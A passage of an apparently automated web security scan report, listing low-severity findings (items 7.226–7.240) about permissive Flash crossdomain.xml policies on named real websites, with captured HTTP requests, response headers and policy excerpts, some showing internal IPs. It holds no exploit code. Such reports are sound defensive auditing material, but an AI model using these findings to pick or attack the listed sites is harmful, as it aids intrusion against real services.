Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailykos.com

Response

HTTP/1.0 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:09:30 GMT
Accept-Ranges: bytes
ETag: "c2e9f-4f3-49c267bd3a1c0"
Connection: close
Last-Modified: Sun, 13 Feb 2011 09:23:27 GMT
Content-Length: 1267

<?xml version="1.0"?>
<!--
Macromedia enforces some security policies in Flash that keep movies on one
domain from loading data files on another domain. If a Flash movie is trying to
load data from
...[SNIP]...
<allow-access-from domain="dailykos.com" />
<allow-access-from domain="*.dailykos.com" />
...[SNIP]...

7.226. http://www.dailymotion.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dailymotion.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dailymotion.com

Response

HTTP/1.0 200 OK
Server: DMS/1.0.42
Vary: Accept-Encoding
Cache-Control: max-age=86400
Content-Type: text/xml; charset=utf-8
P3p: policyref="http://www.dailymotion.com/w3c/p3p.xml", CP="IDC DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Sat, 02 Apr 2011 05:19:44 GMT
X-DM-Cache: DO
Accept-Ranges: bytes
X-Dm-Page: us.html.crossdomain
Connection: close
X-Cache-Info: cached
Content-Length: 4368

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only
...[SNIP]...
<allow-access-from domain="*.dailymotion.com"/><allow-access-from domain="*.dmcdn.net"/><allow-access-from domain="*.virgilio.it"/><allow-access-from domain="*.dailymotion.pl"/><allow-access-from domain="*.lunchbox-lustucruselection.fr"/><allow-access-from domain="*.tangozebra.com" /><allow-access-from domain="motifcdn2.doubleclick.net" /><allow-access-from domain="ad.au.doubleclick.net" /><allow-access-from domain="betadfa.doubleclick.net" /><allow-access-from domain="betadfa.doubleclick.com" /><allow-access-from domain="ad.cn.doubleclick.net" /><allow-access-from domain="ad.de.doubleclick.net" /><allow-access-from domain="ad.doubleclick.net" /><allow-access-from domain="ad.es.doubleclick.net" /><allow-access-from domain="ad.fr.doubleclick.net" /><allow-access-from domain="ad.hk.doubleclick.net" /><allow-access-from domain="ad.ie.doubleclick.net" /><allow-access-from domain="ad.it.doubleclick.net" /><allow-access-from domain="ad.jp.doubleclick.net" /><allow-access-from domain="ad.nl.doubleclick.net" /><allow-access-from domain="ad.se.doubleclick.net" /><allow-access-from domain="ad.tw.doubleclick.net" /><allow-access-from domain="ad.uk.doubleclick.net" /><allow-access-from domain="creatives.doubleclick.net" /><allow-access-from domain="dfa.doubleclick.com" /><allow-access-from domain="dfa.doubleclick.net" /><allow-access-from domain="dfp.doubleclick.com" /><allow-access-from domain="dfp.doubleclick.net" /><allow-access-from domain="doubleclick.net" /><allow-access-from domain="m.2mdn.net" /><allow-access-from domain="m.au.2mdn.net" /><allow-access-from domain="m.cn.2mdn.net" /><allow-access-from domain="m.de.2mdn.net" /><allow-access-from domain="m.doubleclick.net" /><allow-access-from domain="m.fr.2mdn.net" /><allow-access-from domain="m.hk.2mdn.net" /><allow-access-from domain="m.jp.2mdn.net" /><allow-access-from domain="m.se.2mdn.net" /><allow-access-from domain="m.tw.2mdn.net" /><allow-access-from domain="m.uk.2mdn.net" /><allow-access-from 
domain="m1.2mdn.net" /><allow-access-from domain="m1.doubleclick.net" /><allow-access-from domain="m1.jp.2mdn.net" /><allow-access-from domain="m2.2mdn.net" /><allow-access-from domain="m2.doubleclick.net" /><allow-access-from domain="m3.2mdn.net" /><allow-access-from domain="m3.doubleclick.net" /><allow-access-from domain="motifcdn.doubleclick.net" /><allow-access-from domain="motifcdn2.doubleclick.net" /><allow-access-from domain="sandbox.dartmotif.com" /><allow-access-from domain="demo.doubleclick.com" /><allow-access-from domain="demo.doubleclick.net" /><allow-access-from domain="m.au.2mdn.net" /><allow-access-from domain="m.cn.2mdn.net" /><allow-access-from domain="m.de.2mdn.net" /><allow-access-from domain="m.doubleclick.net" /><allow-access-from domain="m.fr.2mdn.net" /><allow-access-from domain="m.hk.2mdn.net" /><allow-access-from domain="m.jp.2mdn.net" /><allow-access-from domain="m.se.2mdn.net" /><allow-access-from domain="m.tw.2mdn.net" /><allow-access-from domain="m.uk.2mdn.net" /><allow-access-from domain="m1.2mdn.net" /><allow-access-from domain="marine.tribalddbparis.com" /><allow-access-from domain="*.etremarin.fr" /><allow-access-from domain="*.etremarin.com" /><allow-access-from domain="*.thebinge-lefilm.fr" /><allow-access-from domain="*.thebinge.fr" /><allow-access-from domain="*.binge-lefilm.com" /><allow-access-from domain="*.binge-lefilm.fr" /><allow-access-from domain="*.bingedrinking.fr" /><allow-access-from domain="*.binge-drinking.fr" /><allow-access-from domain="*.thebinge-lefilm.com" /><allow-access-from domain="*.dev.jfg-networks.net" /><allow-access-from domain="*.over-blog.com" /><allow-access-from domain="fdata.over-blog.net" /><allow-access-from domain="*.dail.eu.iogw.org" /><allow-access-from domain="*.dail.eu.iogw.net" /><allow-access-from domain="*.dail.eu.iogw.com" /><allow-access-from domain="*.auditude.com"/><allow-access-from domain="*.dmcloud.net" /><allow-access-from domain="*.smartnsimple.tv" /><allow-access-from 
domain="*.gamecreds.com" /><allow-access-from domain="*.innovid.com" /><allow-access-from domain="*.serving-sys.com" /><allow-access-from domain="*.serving-sys-dev2.com" />
...[SNIP]...

7.227. http://www.dallascowboys.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dallascowboys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dallascowboys.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.54 (Debian GNU/Linux) JRun/4.0 PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
ETag: "17900ac-75-cd42df00"
Accept-Ranges: bytes
Cache-Control: max-age=300
Content-Type: application/xml
Age: 768
Date: Sat, 02 Apr 2011 14:00:16 GMT
Last-Modified: Wed, 23 Jun 2010 04:16:28 GMT
Expires: Sat, 02 Apr 2011 14:00:46 GMT
Content-Length: 117
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.2cimple.com"/>
</cross-domain-policy>

7.228. http://www.dallasnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dallasnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dallasnews.com

Response

HTTP/1.1 200 OK
Set-Cookie: ececluster=R1231783856; path=/; expires=Sun, 03-Apr-2011 13:38:53 GMT
Last-Modified: Thu, 09 Dec 2010 15:43:18 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
x-svrl-ap: test-
Content-Type: text/xml
Vary: Accept-Encoding
cache-control: max-age = 120
Content-Length: 461
Date: Sat, 02 Apr 2011 13:36:51 GMT
X-Varnish: 1463194522 1463153058
Age: 411
Via: 1.1 varnish
Connection: close
X-Cache: HIT:2
x-svrl: V4

<?xml version="1.0" encoding="UTF-8"?>

<!--
Document : crossdomain.xml
Created on : November 26, 2010, 11:26 AM
Author : svorin
Description:
Allow the following domain a
...[SNIP]...
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.wunderground.com" />
...[SNIP]...

7.229. http://www.datpiff.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.datpiff.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.datpiff.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:21 GMT
Server: Apache
Last-Modified: Mon, 29 Nov 2010 00:45:49 GMT
ETag: "5c900fb-ef-4962664afa940"
Accept-Ranges: bytes
Content-Length: 239
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.datpiff.com" />
...[SNIP]...

7.230. http://www.dell.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dell.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dell.com

Response

HTTP/1.1 200 OK
Content-Length: 370
Content-Type: text/xml
Last-Modified: Fri, 27 Jun 2008 14:53:19 GMT
Accept-Ranges: bytes
ETag: "fde0f98965d8c81:0"
Server: Microsoft-IIS/7.0
Set-Cookie: stop_mobi=; path=/
X-Powered-By: ASP.NET
X-UA-Compatible: IE=7
P3P: CP=" BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI "
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.dell.com -->
<cross-domain-policy>
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.coltas.com" />
<allow-access-from domain="*.dellpartnerdirect.com" />
...[SNIP]...

7.231. http://www.demdex.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.demdex.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.demdex.net

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:36 GMT
Server: Apache/2.2.10 (Unix)
Last-Modified: Thu, 09 Dec 2010 16:36:41 GMT
ETag: "6869d-d0-496fcd7a9d840"
Accept-Ranges: bytes
Content-Length: 208
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
Keep-Alive: timeout=5, max=99
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.adap.tv"/>
</cross-domain-
...[SNIP]...

7.232. http://www.dickssportinggoods.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dickssportinggoods.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dickssportinggoods.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:32:26 GMT
ETag: "4bc054-309-44cae0dc6de80"
Accept-Ranges: bytes
Content-Length: 777
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:34:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="www.dickssportinggoods.com"/>
<allow-access-from domain="dsp.imageg.net"/>
<allow-access-from domain="dsp.merch2.gspt.net"/>
<allow-access-from domain="dsp.merch.gspt.net"/>
<allow-access-from domain="preview.gsipartners.com"/>
<allow-access-from domain="preview1.gsipartners.com"/>
<allow-access-from domain="preview.remotetools.gsipartners.com"/>
<allow-access-from domain="preview1.remotetools.gsipartners.com"/>
<allow-access-from domain="*.gspt.net"/>
<allow-access-from domain="*.gsipartners.com"/>
<allow-access-from domain="172.20.1.236" />
<allow-access-from domain="172.21.1.236" />
<allow-access-from domain="206.16.220.236" />
<allow-access-from domain="63.240.110.236" />
...[SNIP]...

7.233. http://www.directv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.directv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.directv.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 138
Content-Type: text/xml
Last-Modified: Wed, 08 Dec 2010 23:00:17 GMT
Accept-Ranges: bytes
ETag: "801612ae2b97cb1:80b"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=FFF623684C9DCFC58CA7CFB0C5FAA01D; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=FFF623684C9DCFC58CA7CFB0C5FAA01D; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:10 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="*.directv.com"/>
<allow-access-from domain="*.brightcove.com"/>
</cross-domain-policy>

7.234. http://www.discovery.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.discovery.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.discovery.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.15 (Unix)
Last-Modified: Mon, 13 Dec 2010 19:02:38 GMT
ETag: "238b88-1763-4974f58fc8f80"
Accept-Ranges: bytes
Content-Length: 5987
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:25:18 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<!-- GLOBAL DISCOVERY -->
<allow-access-from domain="*.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stage.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.stg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.uat.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.test.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dpr.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.dev.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.oascentral.discovery.com" />
...[SNIP]...
<allow-access-from domain="dctladreg01.itg.discovery.com" />
...[SNIP]...
<allow-access-from domain="*.discoverymedia.com" />
...[SNIP]...
<allow-access-from domain="*.pointroll.com" />
...[SNIP]...
<allow-access-from domain="*.247realmedia.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.*" />
...[SNIP]...
<allow-access-from domain="*.akamai.net" />
...[SNIP]...
<allow-access-from domain="*.pets911.com" />
<allow-access-from domain="pets911.buffalo.com" />
...[SNIP]...
<allow-access-from domain="discovery.blogs.com" />
...[SNIP]...
<allow-access-from domain="*.brightcove.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.vo.llnwd.net" />
...[SNIP]...
<allow-access-from domain="*.brightcove.*" />
...[SNIP]...
<allow-access-from domain="*.channelfinder.net" />
...[SNIP]...
<allow-access-from domain="*.foodfit.com" />
<allow-access-from domain="*.healthgrades.com" />
<allow-access-from domain="*.centerwatch.com" />
<allow-access-from domain="*.sittercity.com" />
<allow-access-from domain="*.chumby.com" />
...[SNIP]...
<allow-access-from domain="*.howstuffworks.com" />
...[SNIP]...
<allow-access-from domain="*.petfinder.com" />
...[SNIP]...
<allow-access-from domain="*.treehugger.com" />
...[SNIP]...
<allow-access-from domain="*.crewintegrated.com" />
...[SNIP]...
<allow-access-from domain="video.search.yahoo.com" />
...[SNIP]...
<allow-access-from domain="*.tv.com" />
...[SNIP]...
<allow-access-from domain="test.bayrock.net" />
...[SNIP]...
<allow-access-from domain="test.philadelphiaspeed.net" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.sympleton.com" />
...[SNIP]...
<allow-access-from domain="*.att.com" />
...[SNIP]...
<allow-access-from domain="*.clearspring.com" />
...[SNIP]...

7.235. http://www.diynetwork.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.diynetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.diynetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 09 Nov 2009 19:15:05 GMT
Accept-Ranges: bytes
Content-Length: 967
Content-Type: application/xml
Date: Sat, 02 Apr 2011 14:03:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.hgtvpro.com"/>
<allow-access-from domain="*.hgtv.com"/>
<allow-access-from domain="*.diynetwork.com"/>
<allow-access-from domain="*.diynet.com"/>
<allow-access-from domain="*.fineliving.com"/>
<allow-access-from domain="*.food.com"/>
<allow-access-from domain="*.foodnetwork.com"/>
<allow-access-from domain="*.gactv.com"/>
<allow-access-from domain="*.scrippsonline.com"/>
<allow-access-from domain="*.hottrends2005.com"/>
<allow-access-from domain="*.hottrends2006.com"/>
<allow-access-from domain="*.scrippsnetworks.com"/>
<allow-access-from domain="72.3.226.28" />
<allow-access-from domain="*.widgets.isg-marketing.com" />
<allow-access-from domain="*.videomment.com" />
<allow-access-from domain="*.videomerce.com"/>
...[SNIP]...

7.236. http://www.dslreports.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dslreports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dslreports.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 14:03:16 GMT
Content-Type: text/xml
Content-Length: 393
Last-Modified: Wed, 07 May 2008 23:58:53 GMT
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="www.targetscope.com" />
<allow-access-from domain="www.broadbandreports.com" />
<allow-access-from domain="www.dslreports.com" />
<allow-access-from domain="dev.dslreports.com" />
<allow-access-from domain="www.aggiejy.com" />
<allow-access-from domain="216.254.95.41" />
<allow-access-from domain="*.catt.com" />
...[SNIP]...

7.237. http://www.dt00.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.dt00.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.dt00.net

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 14:00:05 GMT
Content-Type: text/xml
Content-Length: 526
Last-Modified: Tue, 21 Jul 2009 13:01:21 GMT
Connection: close
Expires: Mon, 02 May 2011 14:00:05 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="intv.ru" to-ports="80"/>
<allow-http-request-headers-from domain="intv.ru" headers="*" />
<allow-access-from domain="*.intv.ru" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="www.liveresult.ru" to-ports="80"/>
...[SNIP]...

7.238. http://www.ebay.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ebay.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ebay.ca

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Expires: Sat, 02 Apr 2011 14:10:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 14:10:04 GMT
Content-Length: 3890
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

7.239. http://www.economist.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.economist.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.economist.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 25 Mar 2011 15:58:35 GMT
ETag: "78092-267-49f50aa9600c0"
Cache-Control: max-age=1209600
Expires: Tue, 12 Apr 2011 08:20:55 GMT
X-ws: 9
Content-Type: text/xml
Content-Length: 615
Date: Sat, 02 Apr 2011 13:54:47 GMT
X-Varnish: 1459381536 1449341695
Age: 365632
Via: 1.1 varnish
Connection: close
X-Varnish-Cache: HIT

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.economist.com"/>
<allow-access-from domain="*.*.economist.com"/>
<allow-access-from domain="*.zedo.com"/>
<allow-access-from domain="*.tangozebra.com"/>
<allow-access-from domain="*.*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
<allow-access-from domain="*.*.2mdn.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="sandbox.dartmotif.com"/>
<allow-access-from domain="*.serving-sys.com"/>
...[SNIP]...

7.240. http://www.edmunds.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.edmunds.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.edmunds.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml; charset=ISO-8859-1
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: policyref="http://www.edmunds.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Expires: Sat, 02 Apr 2011 13:24:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:24:29 GMT
Content-Length: 2311
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<!-- http://www.edmunds.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="www.insideline.com"/>
<allow-access-from domain="*.insideline.com"/>
<allow-access-from domain="*.edmunds-media.com"/>
<allow-access-from domain="*.il.edmunds-media.com"/>
<allow-access-from domain="*.ed.edmunds-media.com"/>
...[SNIP]...
<allow-access-from domain="*.edmunds.com"/>
<allow-access-from domain="204.16.217.*"/>
...[SNIP]...
<allow-access-from domain="204.2.160.*"/>
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net"/>
...[SNIP]...
